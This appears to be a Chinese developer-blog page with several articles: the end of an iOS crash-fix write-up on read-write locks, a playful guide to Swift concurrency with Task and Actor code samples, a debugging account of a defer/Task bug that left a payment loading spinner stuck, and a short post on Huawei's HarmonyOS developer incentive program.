  • 条件变量(Condition Variable) :用于实现线程的等待和通知机制。通常,会有两个条件变量,一个用于读线程,一个用于写线程。

当线程尝试获取读锁时,它会检查写锁状态和读计数器,如果当前没有写线程正在访问资源,则增加读计数器并允许读线程继续;如果存在写操作,则读线程将被阻塞,直到写操作完成。

类似地,当线程尝试获取写锁时,它会检查读计数器和写锁状态。如果当前没有读线程和写线程正在访问资源,则设置写锁状态并允许写线程继续;如果有读线程或写线程正在访问资源,则写线程将被阻塞,直到所有读线程和前一个写线程完成操作。

这个改动上线后,该崩溃得到了有效治理。

大家可以看到治理之前,该崩溃基本每天都有:

治理之后新版本没出现,只有旧版本偶现:

四. 总结

以上主要介绍了针对这个崩溃分析和治理过程的探索和思考,当然其中的原因并没有得到官方资料,只是自己排查的推测,如果大家有其他见解,欢迎留言讨论。

若本文有错误之处或者技术上关于其他类型Crash的讨论交流的,欢迎评论区留言。

Swift 多线程通关指南:从 GCD 回调地狱到 Task/Actor 躺赢

各位 iOS 开发者宝子们,谁还没被多线程折磨过?想当年用 GCD 的时候,回调嵌套像套娃,线程安全像走钢丝,查个数据错乱的 Bug 能熬到半夜发际线后移。直到 Swift 5.5 甩出了「并发框架」这个王炸,Task 和 Actor 闪亮登场,才让我们摆脱了 “多线程 PUA”。

今天这篇博客,咱们就用 “唠嗑式” 风格,把 Task、Actor 的原理、用法、最佳实践和避坑指南讲得明明白白,保证你看得懂、用得上,还能顺便笑出声。

一、前言:那些年我们踩过的 GCD 坑

在聊新东西之前,先扎心回顾一下 GCD 的 “罪行”:

  1. 回调地狱:请求接口→解析数据→更新 UI,三层嵌套下去,代码像俄罗斯套娃,后期维护看一眼就脑壳疼;
  2. 线程安全玄学:多个线程同时修改一个变量,时而正常时而崩溃,数据错乱的 Bug 查半天,最后发现是忘了加dispatch_barrier
  3. 生命周期失控:手动创建的队列和任务,一不小心就忘记取消,导致内存泄漏或无效操作;
  4. 主线程判断麻烦:更新 UI 前还要写if Thread.isMainThread,稍不注意就闪退。

直到 Swift 并发框架上线,Task(异步任务包工头)和 Actor(线程安全管理员)强强联手,才让多线程开发从 “渡劫” 变成 “躺赢”。接下来,咱们逐个拆解这两个核心玩家。

二、核心玩家 1:Task —— 异步任务的 “包工头”

1. 什么是 Task?通俗点说就是 “干活的包工头”

你可以把 Task 理解为一个包工头,你给它分配活(异步代码),它会帮你安排工人(线程)去干,还能告诉你啥时候干完(通过await等待结果)。

它的核心作用是封装异步操作,摆脱 GCD 的闭包嵌套,让异步代码像同步代码一样线性书写 —— 这也是 Swift 并发的核心优势:异步代码同步化

2. Task 的核心原理:结构化 vs 非结构化(家族企业 vs 野生放养)

Task 有两种核心形态,这是理解它的关键,咱们用比喻讲清楚:

(1)结构化并发(默认 Task):家族企业,父子绑定

// 结构化Task:父任务(包工头老板)
func parentTask() async {
    print("老板:我要安排个小工干活")
    // 子任务(小工):继承父任务的上下文(优先级、取消状态等)
    let result = await Task {
        print("小工:开始干活")
        await Task.sleep(1_000_000_000) // 干活1秒
        return "活干完了"
    }.value
    
    print("老板:小工汇报结果:(result)")
}

核心特性(家族企业规则)

  • 父任务会等子任务干完才继续执行(老板等小工汇报);
  • 子任务继承父任务的 “家底”:优先级、Actor 上下文、取消状态等;
  • 父任务被取消,子任务会跟着被取消(老板跑路,小工也停工);
  • 编译器会自动管理任务生命周期,不用手动操心内存泄漏。

这是 Swift 官方强烈推荐的用法,也是最安全、最省心的方式。

(2)非结构化并发(Task.detached):野生放养,自生自灭

// 非结构化Task:野生包工头,和你没关系
func wildTask() {
    print("我:安排个野生包工头干活")
    let task = Task.detached {
        print("野生包工头:自己干自己的")
        await Task.sleep(1_000_000_000)
        return "野生活干完了"
    }
    
    // 想拿结果得主动等
    Task {
        let result = await task.value
        print("我:野生包工头汇报结果:(result)")
    }
}

核心特性(野生规则)

  • 不继承任何上下文(优先级、Actor 等都是默认值);
  • 和创建它的线程 / 任务 “断绝关系”,父不管子,子不认父;
  • 生命周期完全由你手动管理,忘记取消就可能导致内存泄漏;
  • 仅适用于 “不需要依赖当前上下文,完全独立的任务”(比如后台同步日志)。

3. Task 的 3 种常用创建方式(代码示例 + 场景)

创建方式 代码示例 适用场景
结构化 Task(默认) Task { await doSomething() } 大部分业务场景(接口请求、数据处理等),依赖当前上下文
非结构化 Task Task.detached { await doSomething() } 独立后台任务(日志同步、缓存清理等),不依赖当前上下文
指定 Actor Task Task { @MainActor in updateUI() } 直接切换到指定 Actor(如 MainActor 更新 UI)

4. Task 的小知识点(必知必会)

  • 优先级:可以给 Task 指定优先级,系统会优先调度高优先级任务(比如支付>后台同步):
// 高优先级:用户主动操作
Task(priority: .userInitiated) {
    await processPayment()
}
// 低优先级:后台辅助操作
Task(priority: .utility) {
    await syncLocalCache()
}
  • 取消:Task 的取消是 “协作式” 的(不是强制枪毙,是提醒任务自己停工):
let task = Task {
    // 干活前先检查是否被取消
    if Task.isCancelled {
        return
    }
    await doSomething()
    // 干活中途也可以检查
    try Task.checkCancellation()
    await doSomethingElse()
}
// 手动取消任务
task.cancel()
  • 等待结果:用await task.value可以获取 Task 的执行结果,结构化 Task 也可以直接内联等待。

三、核心玩家 2:Actor —— 线程安全的 “卫生间管理员”

1. 线程安全的痛点:多个人抢卫生间的噩梦

先想一个场景:你和同事们共用一个卫生间(共享变量),如果没有管理员,大家同时挤进去,场面会极度混乱(数据错乱、崩溃)。

在多线程中,这个 “卫生间” 就是共享变量(比如var userList: [User]),“抢卫生间” 就是多个线程同时读写这个变量,这也是 GCD 中最头疼的问题。

2. 什么是 Actor?通俗点说就是 “卫生间管理员”

Actor 的核心作用是保证线程安全,它就像一个严格的卫生间管理员,遵守一个铁律:一次只允许一个线程(人)进入 Actor 的 “私人空间”(内部属性和方法)

这样一来,就从根本上杜绝了 “多线程同时读写共享变量” 的问题,不用再手动加锁、加屏障,编译器会帮你搞定一切。

3. Actor 的核心原理:隔离域 + 消息传递

Actor 的底层原理其实很简单,就两个关键点,咱们用大白话解释:

(1)隔离域(私人空间)

每个 Actor 都有自己的 “隔离域”,相当于卫生间的围墙,外部线程无法直接访问 Actor 内部的属性和方法,只能通过管理员(Actor)传递消息。

比如你不能直接写actor.userList = [],编译器会直接报错 —— 这就像你不能直接踹开卫生间门,只能跟管理员说 “我要进去”。

(2)消息传递(排队叫号)

外部线程想要操作 Actor 的内部资源,需要给 Actor 发送 “消息”(调用 Actor 的方法),Actor 会把这些消息排成一个队列,然后串行处理(一个接一个,不插队)。

这就像你跟管理员说 “我要进去”,管理员会把你排到队尾,等前面的人出来,再让你进去,完美保证了安全。

4. Actor 的使用方法(代码示例 + 场景)

(1)自定义 Actor:创建你的 “卫生间管理员”

// 定义一个Actor:用户列表管理员
actor UserManager {
    // 内部共享变量(卫生间):外部无法直接访问
    private var userList: [String] = []
    
    // 提供方法(叫号服务):外部可以通过await调用
    func addUser(_ name: String) {
        // 这里的代码串行执行,绝对线程安全
        userList.append(name)
        print("添加用户:(name),当前列表:(userList)")
    }
    
    func getUserList() -> [String] {
        return userList
    }
}

// 使用Actor
func useUserManager() async {
    // 创建Actor实例
    let manager = UserManager()
    
    // 调用Actor方法:必须加await(等管理员叫号)
    await manager.addUser("张三")
    await manager.addUser("李四")
    
    // 获取用户列表
    let list = await manager.getUserList()
    print("最终用户列表:(list)")
}

关键注意点:调用 Actor 的任何方法都必须加await,因为 Actor 处理消息需要时间,这是一个异步操作。

(2)MainActor:专属主线程的 “UI 管理员”

除了自定义 Actor,Swift 还提供了一个特殊的 Actor——MainActor,它专门绑定主线程,是更新 UI 的 “专属通道”。

我们知道,UI 操作必须在主线程执行,以前用 GCD 要写dispatch_async(dispatch_get_main_queue()),现在用MainActor更简单:

// 方式1:修饰函数,整个函数在主线程执行
@MainActor
func updateUserName(_ name: String) {
    // 这里的代码一定在主线程执行,放心更新UI
    self.userNameLabel.text = name
}

// 方式2:修饰属性,属性的读写都在主线程
@MainActor var userAvatar: UIImage?

// 方式3:在Task中指定MainActor
Task { @MainActor in
    self.userNameLabel.text = "张三"
}

// 方式4:await MainActor.run 局部切换主线程
Task {
    // 后台执行耗时操作
    let user = await fetchUser()
    // 切换到主线程更新UI
    await MainActor.run {
        self.userNameLabel.text = user.name
    }
}

MainActor 是 UI 更新的首选,不用再手动判断主线程,编译器会帮你保证 UI 操作在主线程执行,杜绝闪退。

5. Actor 的小知识点(必知必会)

  • Actor 重入:Actor 允许 “嵌套调用”,比如 Actor 的方法 A 调用了方法 B,这是允许的,且仍然串行执行;
  • Actor 间通信:多个 Actor 之间调用方法,同样需要加await,编译器会自动处理消息传递;
  • 不可变属性:Actor 的不可变属性(let)可以直接访问(不用await),因为不可变属性不会有线程安全问题。

四、黄金搭档:Task + Actor 实战演练

光说不练假把式,咱们结合实际业务场景,看看 Task 和 Actor 怎么配合使用:

场景:接口请求 + 数据解析 + UI 更新(线程安全版)

// 1. 定义数据存储Actor(保证线程安全)
actor DataStore {
    private var userData: UserModel?
    
    func saveUser(_ user: UserModel) {
        userData = user
    }
    
    func getUser() -> UserModel? {
        return userData
    }
}

// 2. 接口请求函数(后台执行)
func fetchUserFromAPI() async throws -> UserModel {
    // 模拟接口请求(后台线程)
    await Task.sleep(1_000_000_000)
    return UserModel(name: "李四", age: 25)
}

// 3. 核心业务逻辑(Task + Actor + MainActor)
func loadUserData() {
    // 结构化Task:管理异步流程
    Task {
        do {
            // 步骤1:主线程显示加载动画
            await MainActor.run {
                self.loadingView.isHidden = false
            }
            
            // 步骤2:后台请求接口(非主线程,不卡顿UI)
            let user = try await fetchUserFromAPI()
            
            // 步骤3:线程安全存储数据
            let dataStore = DataStore()
            await dataStore.saveUser(user)
            
            // 步骤4:主线程更新UI + 隐藏加载动画
            await MainActor.run {
                self.userNameLabel.text = user.name
                self.ageLabel.text = "(user.age)"
                self.loadingView.isHidden = true
            }
            
        } catch {
            // 异常处理:主线程隐藏加载动画 + 提示错误
            await MainActor.run {
                self.loadingView.isHidden = true
                self.toastLabel.text = "请求失败:(error.localizedDescription)"
            }
        }
    }
}

这个示例完美结合了 Task(异步流程管理)、Actor(数据存储线程安全)、MainActor(UI 更新),没有回调嵌套,线程安全有保障,UI 不卡顿,这就是 Swift 并发的正确打开方式!

五、最佳实践:少踩坑,多摸鱼

掌握了原理和用法,接下来的最佳实践能让你在实际开发中事半功倍,少走弯路:

1. 优先使用结构化 Task,拒绝放养式 Task.detached

结构化 Task 的生命周期由编译器管理,安全省心,90% 的场景都用它。只有在需要完全独立的后台任务(如日志同步)时,才考虑 Task.detached,且一定要手动管理取消。

2. UI 更新认准 MainActor,别在后台瞎折腾

无论用@MainActor修饰函数、还是await MainActor.run,都要保证 UI 操作在主线程执行,这是杜绝 UI 闪退和卡顿的关键。

3. Actor 里只放线程不安全的状态,别啥都往里塞

Actor 的方法是串行执行的,如果把非共享的、不需要线程安全的逻辑也放进 Actor,会降低执行效率。Actor 只负责管理 “共享可变状态”(如用户列表、缓存数据)。

4. 用 TaskGroup 管理多任务,批量控制更省心

如果需要并行执行多个任务(如批量请求接口),用TaskGroup比手动创建多个 Task 更方便,支持批量添加、批量取消、批量获取结果:

await withTaskGroup(of: UserModel.self) { group in
    // 批量添加任务
    for userId in [1,2,3] {
        group.addTask {
            return await fetchUserById(userId)
        }
    }
    
    // 批量获取结果
    for await user in group {
        print("获取到用户:(user.name)")
    }
}

5. defer 里别乱创 Task,小心 “幽灵任务”

这是咱们之前踩过的坑:defer块里创建的异步 Task,可能因为上下文销毁而无法执行(比如页面关闭后,Task 还没被调度),导致加载动画关不掉、资源清理不彻底。

6. 关键节点检查 Task 取消状态,避免无效操作

如果用户中途退出页面,对应的 Task 应该被取消,在耗时操作前后检查Task.isCancelledtry Task.checkCancellation(),可以及时终止无效操作,节省资源。

六、避坑指南:那些让你头秃的坑

即使掌握了最佳实践,也难免踩坑,这些坑你一定要警惕:

1. 坑 1:Actor 重入 —— 看似串行,实则可能嵌套执行

Actor 允许方法嵌套调用,比如:

actor MyActor {
    func methodA() async {
        print("A开始")
        await methodB()
        print("A结束")
    }
    
    func methodB() async {
        print("B执行")
    }
}

调用await myActor.methodA()时,会输出 “A 开始→B 执行→A 结束”,这是正常的,且仍然线程安全,不用过度担心。

2. 坑 2:Task 取消是 “协作式”,不是 “强制枪毙”

Task 不会被强制终止,只有在 “取消检查点” 才会响应取消:

  • ✅ 取消检查点:await异步操作、try Task.checkCancellation()await Task.yield()
  • ❌ 非检查点:长时间同步循环(如for i in 0..<1000000),不会响应取消

如果有长时间同步代码,要手动插入取消检查:

Task {
    for i in 0..<1000000 {
        // 手动检查取消状态
        if Task.isCancelled {
            return
        }
        heavySyncWork(i)
    }
}

3. 坑 3:在 MainActor 函数里执行耗时操作,导致 UI 卡顿

@MainActor修饰的函数会在主线程执行,如果在里面执行耗时操作(如大数据解析、复杂加密),会阻塞主线程,导致 UI 卡顿:

// ❌ 错误做法:主线程执行耗时解析
@MainActor
func parseLargeData(_ data: Data) {
    let model = try! JSONDecoder().decode(LargeModel.self, from: data)
    self.model = model
}

// ✅ 正确做法:后台解析,主线程更新UI
func loadLargeData() {
    Task {
        // 后台解析
        let model = await Task.detached {
            return try! JSONDecoder().decode(LargeModel.self, from: data)
        }.value
        
        // 主线程更新UI
        await MainActor.run {
            self.model = model
        }
    }
}

4. 坑 4:直接访问 Actor 的属性,编译器会报错

Actor 的属性是隔离的,外部无法直接访问,必须通过方法获取:

// ❌ 错误做法:直接访问Actor属性
let manager = UserManager()
print(manager.userList) // 编译器报错

// ✅ 正确做法:通过Actor方法获取
let list = await manager.getUserList()
print(list)

5. 坑 5:非结构化 Task 忘记取消,导致内存泄漏

Task.detached 创建的任务如果持有了self,且忘记取消,会导致self无法释放,内存泄漏:

// ❌ 错误做法:忘记取消Task
func badTask() {
    Task.detached { [weak self] in
        guard let self = self else { return }
        while true {
            await self.syncLog()
            await Task.sleep(10_000_000_000)
        }
    }
}

// ✅ 正确做法:手动持有Task,在合适时机取消
class MyVC: UIViewController {
    private var syncTask: Task<Void, Never>?
    
    override func viewDidLoad() {
        super.viewDidLoad()
        syncTask = Task.detached { [weak self] in
            guard let self = self else { return }
            while !Task.isCancelled {
                await self.syncLog()
                await Task.sleep(10_000_000_000)
            }
        }
    }
    
    override func viewWillDisappear(_ animated: Bool) {
        super.viewWillDisappear(animated)
        // 页面消失时取消任务
        syncTask?.cancel()
    }
}

七、总结:Swift 多线程的正确打开方式

  1. 告别 GCD 回调地狱:用 Task 把异步代码写成同步风格,线性书写,易读易维护;
  2. 告别线程安全玄学:用 Actor(尤其是 MainActor)保证线程安全,不用手动加锁;
  3. 优先结构化并发:90% 的场景用默认 Task,少用 Task.detached,避免生命周期失控;
  4. UI 更新认准 MainActor:无论是@MainActor还是await MainActor.run,保证 UI 在主线程执行;
  5. 关键节点检查取消:在耗时操作前后检查 Task 取消状态,避免无效操作;
  6. 用 TaskGroup 管理多任务:批量添加、批量取消,效率更高。

Swift 的 Task 和 Actor 不是银弹,但它们确实让多线程开发变得更简单、更安全。从 GCD 过渡到 Swift 并发框架,可能需要一点时间,但一旦掌握,你会发现打开了新世界的大门 —— 原来多线程开发也可以这么轻松!

最后,送大家一句话:多线程不可怕,只要用好 Task 和 Actor,你也能躺赢!

同步的 defer,异步的陷阱:Swift 并发中加载动画关不掉的调试实录

在 Swift 并发编程中,defer语句与Task的组合常常暗藏认知偏差,很容易写出 “看似合理、实际失效” 的代码。本文将通过一次真实的调试经历,拆解 “为什么defer中的代码看似合理却没有执行” 的核心原因,并梳理对应的最佳实践与避坑指南。

场景重现:挥之不去的支付加载动画

在支付页面的开发中,我们需要实现一个基础功能:支付流程执行完毕后,自动关闭加载动画。最初的代码实现如下,逻辑看似无懈可击,但实际运行中,加载动画偶尔会 “幽灵般” 无法关闭。

func processPayment() {
    Task {
        showLoading = true
        
        defer {
            // 主观预期:此处代码会可靠执行,关闭加载动画
            Task { @MainActor in
                showLoading = false
            }
        }
        
        let result = await paymentService.pay()
        handleResult(result)
    }
}

核心知识点拆解:问题的本质

知识点 1:defer的执行边界 —— 仅保证同步代码可靠执行

defer语句的核心特性是在当前作用域退出时必然执行,无论作用域是正常返回、抛出错误还是被取消。但这一 “必然执行” 的保证,仅针对defer块内的同步代码。

func example() {
    defer {
        print("1. 我一定会执行(同步代码)")
        
        Task {
            print("2. 我可能不会执行(异步任务)")
        }
    }
    
    print("3. 正常业务代码")
}

上述代码中,print("1. 我一定会执行")会百分百触发,但内部创建的异步Task可能还未被系统调度,当前作用域就已完全销毁,导致异步任务无法执行。

知识点 2:Swift Task的取消特性 —— 协作式而非强制式

Swift 的Task取消遵循 “协作式” 原则,而非强制终止任务运行。这一特性决定了defer本身的执行稳定性,但无法保障defer内新创建异步任务的执行。

Task {
    defer {
        print("即使任务被取消,我也会执行")
    }
    
    // 此处会自动检查任务取消状态
    try await someAsyncWork()
    
    // 若任务被取消,上面的await会抛出CancellationError
    // 但defer块仍会不受影响地执行
}

关键痛点:defer块本身会可靠执行,但其中新创建的异步任务,可能因调度延迟、上下文销毁等问题,无法正常执行后续逻辑。

知识点 3:页面销毁时的 “时间差”—— 状态失效的隐形杀手

当支付流程完成后执行页面销毁操作时,时序上的错位会直接导致加载动画关闭逻辑失效,这也是问题复现的核心场景。

问题时序线

  1. await paymentService.pay()执行完成,dismissPage()被调用,页面开始销毁流程
  2. SwiftUI 框架开始销毁当前 View 实例,释放相关资源
  3. View 中的@StateshowLoading)等状态变量被清理失效
  4. 外层Task作用域退出,defer块执行,创建新的异步Task
  5. Task尚未被系统调度,View 已完全销毁
  6. 即便后续新Task被调度执行,showLoading = false对已销毁的 View 无任何效果,动画无法关闭

正确解决方案:抛弃 “嵌套异步”,直接主线程同步执行

解决该问题的核心思路是:避免在defer中创建新异步任务,直接通过await MainActor.run在主线程同步执行 UI 更新操作,消除调度延迟与上下文失效的风险。

func processPayment() {
    Task {
        // 主线程开启加载动画
        await MainActor.run {
            showLoading = true
        }
        
        let result = await paymentService.pay()
        
        // ✅ 最优解:主线程同步执行,确保逻辑可靠触发
        await MainActor.run {
            showLoading = false
            handleResult(result)
        }
    }
}

该方案的优势

  1. await MainActor.run会阻塞当前Task,等待主线程上的 UI 操作执行完成后再继续,无调度延迟
  2. 不创建新的异步Task,直接复用外层Task上下文,避免上下文销毁导致的逻辑失效
  3. 即使外层Task被取消,await之前的代码已执行完毕,await内的逻辑也会优先完成核心清理工作

延伸知识点:Swift Task 生命周期深度解析

1. Task 的三种核心创建方式

创建方式 特性 适用场景
结构化并发(推荐)Task { /* 代码 */ } 继承当前上下文(Actor、优先级、取消状态等) 大部分业务场景,依赖当前上下文的异步操作
非结构化并发Task.detached { /* 代码 */ } 拥有独立执行上下文,不继承当前环境 无需依赖当前上下文的独立异步任务
指定 Actor 执行Task { @MainActor in /* 代码 */ } 绑定指定 Actor(如主线程)执行,自动处理线程切换 直接更新 UI 或操作 Actor 内状态的场景

2. Task 的取消检查点

Task仅在特定时机自动检查取消状态,非检查点内的长时间同步代码会无视取消指令,导致任务 “无法终止”。

Task {
    // ✅ 自动检查取消状态的时机
    try await someAsyncOperation() // 异步等待时自动检查
    try Task.checkCancellation()   // 手动主动检查取消状态
    await Task.yield()             // 让出执行权时自动检查
    
    // ❌ 不检查取消状态的场景
    for i in 0..<1000000 {
        // 长时间同步循环,不会响应取消指令
        heavySyncWork(i)
    }
}

3. 多任务管理:TaskGroup 的使用

当需要并行执行多个异步任务并统一管理时,TaskGroup是最优选择,可实现批量任务添加、结果汇总、批量取消等功能。

await withTaskGroup(of: Result.self) { group in
    // 批量添加任务
    for item in items {
        group.addTask {
            await processItem(item)
        }
    }
    
    // 按需批量取消所有任务(如某个任务失败时)
    // group.cancelAll()
    
    // 遍历获取所有任务结果
    for await result in group {
        handleTaskResult(result)
    }
}

最佳实践总结

✅ 推荐做法

  1. UI 更新优先使用await MainActor.run,同步执行确保逻辑可靠
  2. 坚决避免在defer块中创建新的异步Task,规避调度与上下文风险
  3. 优先采用结构化并发(默认Task)管理任务生命周期,简化上下文继承
  4. 在长时间异步流程中,主动添加取消检查点(try Task.checkCancellation()
  5. 多任务并行场景,使用TaskGroup实现统一管理与批量控制
// 标准优雅的代码示例
Task {
    // 第一步:主线程更新UI(开启加载/更新状态)
    await MainActor.run {
        updateUI()
    }
    
    // 第二步:执行核心异步业务逻辑
    let result = await processData()
    
    // 第三步:主线程同步更新结果/关闭加载
    await MainActor.run {
        showResult(result)
    }
}

❌ 避免做法

  1. defer中创建异步Task执行清理或 UI 更新操作
  2. 主观假设异步任务会被 “立即调度执行”
  3. 忽略Task的取消状态,导致长时间任务无法终止
  4. 滥用Task.detached(非结构化并发),增加上下文管理成本
  5. 直接在非主线程Task中修改@State等 UI 相关状态
// ❌ 需坚决规避的不良代码
defer {
    Task { @MainActor in
        cleanup()  // 可能因调度延迟或上下文销毁而无法执行
    }
}

实用调试技巧

1. 日志追踪:明确代码执行时序

通过添加有序日志,可快速定位deferTask的执行顺序,排查是否存在异步任务未执行的问题。

Task {
    print("1. 外层Task开始执行")
    defer {
        print("2. defer块开始执行")
    }
    
    await MainActor.run {
        print("3. MainActor.run内UI操作执行")
    }
    
    print("4. 外层Task即将结束")
}

2. 主动检查:确认 Task 取消状态

在关键业务节点主动检查任务取消状态,可提前终止无效逻辑,避免资源浪费。

Task {
    // 关键节点检查取消状态
    if Task.isCancelled {
        print("任务已被取消,终止后续操作")
        return
    }
    
    // 继续执行核心业务逻辑
    let result = await processBusiness()
}

3. 优先级控制:确保关键任务优先执行

通过指定Task优先级,可让核心业务(如支付结果处理、加载动画关闭)优先被系统调度,减少执行延迟。

// 高优先级:用户主动触发的核心操作
Task(priority: .userInitiated) {
    await processPayment()
}

// 低优先级:后台无关紧要的辅助操作
Task(priority: .utility) {
    await syncLocalData()
}

结语:让 Swift 并发代码更可靠

Swift 并发编程的核心难点,在于理解同步操作与异步操作的执行边界,以及Task的生命周期管理。defer语句的 “同步可靠性” 与Task的 “异步调度性” 形成的反差,是导致加载动画无法关闭的根本原因。

在实际开发中,只要遵循 “避免defer内嵌套异步任务”“优先使用await MainActor.run更新 UI”“采用结构化并发管理任务” 的原则,就能有效避开这类隐形陷阱,让代码从 “应该会工作” 变成 “必然会工作”,构建更稳定、更可靠的并发逻辑。

鸿蒙激励的羊毛,你"薅"到了么?

背景

鸿蒙应用开发者激励计划2025,是由华为发起的开发者支持项目,旨在通过提供现金激励,鼓励开发者参与鸿蒙应用、游戏(含游戏App和小游戏,以下如无特指均使用“游戏”统一描述)、元服务的开发,以推动鸿蒙生态的建设和繁荣发展。

距离鸿蒙激励还有最后一天。

跟进政策走

听人说,有些小公司专搞 “面向补贴编程”,靠反复上包薅政策羊毛

我觉得吧,这种路子对刚入门的开发者来说,确实能赚点小钱、当个入门激励。

尤其对于新手来说,比起苹果审核的冷漠,国内安卓市场的内卷,谷歌市场的封杀。鸿蒙开发确实更适合,用自身技能变现+紧跟政策红利。

强者思维

你不是缺机会,你是缺了一双发现机会的眼睛。

思维对比:

  • 有钱人:专注赚钱机会
  • 普通人:专注过程困难

这种深植于骨髓的习惯性思维,短期内看似无关紧要,但拉长到五年、十年,便造就了人与人之间无法逾越的鸿沟。

世界上不缺赚钱的机会,只缺“看见”机会的人。

遵守规则,方得长治久安,最后祝大家大吉大利,今晚过审!

相关推荐

# 苹果开发者续费大坑及成功续费方案!亲测有效

# AppStore敏感词排查手册,多维度分析Guideline 2.3.1隐藏功能,轻松过审。

# 如何主动提防苹果3.2f的进攻,自查防御手册(代码篇)

# 如何主动提防苹果3.2f的进攻,自查防御手册(ASO篇)

# 苹果加急审核是“绿色通道”还是“死亡陷阱”?

# 苹果开发者邮箱,突然收到11.2通知严重么?

# 不想被苹果卡审最好错开这两个提审时间

# 手撕苹果审核4.3是代码问题还是设计问题?

# 有幸和Appstore审核人员进行了一场视频会议特此记录。

❌